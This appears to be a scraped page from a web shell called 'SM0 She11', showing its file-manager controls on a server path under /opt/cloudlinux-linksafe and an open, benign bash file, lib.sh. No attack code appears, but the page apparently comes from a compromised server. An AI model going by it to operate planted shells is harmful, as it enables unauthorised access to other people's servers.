SM0 She11
Path:
/
/
opt
/
cloudlinux-linksafe
Full Path (server): /opt/cloudlinux-linksafe
Create Fil3
Upl04d Fil3
📄 lib.sh
[E]
[D]
[R]
Editing: lib.sh
#!/bin/bash function skip_on_cl_solo() { # Check that this is CLS and skip if yes if [ -f "/etc/cloudlinux-edition-solo" ] || [ -f "/etc/cloudlinux-container" ]; then exit 0 fi }
Save